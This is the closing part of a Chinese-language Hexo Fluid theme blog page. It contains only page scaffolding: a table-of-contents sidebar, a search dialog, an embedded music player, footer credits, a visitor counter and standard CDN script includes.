      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
      <div class="col-lg-7 mx-auto nopadding-x-md">
        <div class="container custom mx-auto">
           <!--音乐--> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.css"> <script src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/meting@1.2/dist/Meting.min.js"></script> <div id="player" class="aplayer aplayer-withlist aplayer-fixed" data-id="9723733050" data-server="netease" data-type="playlist" autoplay="true" data-order="list"  data-fixed="true" data-listfolded="true" data-theme="#2D8CF0"></div> 
        </div>
      </div>
    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       J_0k3r <i class="iconfont icon-love"></i> Hor1zon 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
